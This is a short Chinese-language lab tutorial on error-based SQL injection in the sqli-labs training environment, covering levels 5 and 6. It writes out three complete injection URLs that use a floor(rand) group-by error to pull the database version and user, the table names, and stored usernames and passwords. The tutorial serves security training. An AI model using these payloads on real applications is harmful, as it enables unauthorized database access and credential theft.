​小课堂 -- 报错注入(Get)

简介: ​小课堂 -- 报错注入(Get)

环境sqli-labs

 

less 5

1、我们随便输入',看到报错信息

image.png

可以判断,需要单引号闭合

 

2、构造查询获取数据库名称语句

http://192.168.1.120/sqli/Less-5/?id=1' union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a)limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a --+

image.png

 

3、获取表名语句

http://192.168.1.120/sqli/Less-5/?id=1' union select 1,2,3 from (select count(*),concat((select concat(table_name,0x3a,0x3a)from information_schema.tables where table_schema=database() limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a --+

image.png

 

4、获取用户信息

http://192.168.1.120/sqli/Less-5/?id=1' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a)from security.users limit 2,1),floor (rand(0)*2))x from information_schema.tables group by x)a --+

image.png

 

less 6

双引号闭合,和上面方法相同

 

禁止非法,后果自负

目录
打赏
0
0
0
0
113
分享
相关文章
|
8月前
|
小课堂 -- 显错注入(updatexml和extractvalue)
小课堂 -- 显错注入(updatexml和extractvalue)
84 0
LabVIEW ​​单​进程​共享​变量​与​​全局​变量
LabVIEW ​​单​进程​共享​变量​与​​全局​变量
124 1
支付系统----微信支付20---创建案例项目--集成Mybatis-plus的补充,target下只有接口的编译文件,xml文件了,添加日志的写法
支付系统----微信支付20---创建案例项目--集成Mybatis-plus的补充,target下只有接口的编译文件,xml文件了,添加日志的写法
|
8月前
|
小课堂 -- 报错注入
小课堂 -- 报错注入
30 0
|
8月前
|
Go
小课堂 -- 报错注入(post)
小课堂 -- 报错注入(post)
30 0
小课堂 -- 二次注入
小课堂 -- 二次注入
40 0
|
8月前
|
SQL
​注入工具 -- sqlmap(获取目标)
​注入工具 -- sqlmap(获取目标)
68 0
SpringBoot启动原理——Run方法源码解析《课时十二》
SpringBoot启动原理——Run方法源码解析《课时十二》
113 0
25 大数处理--使用案例
1 大整数的处理使用BigInteger
62 0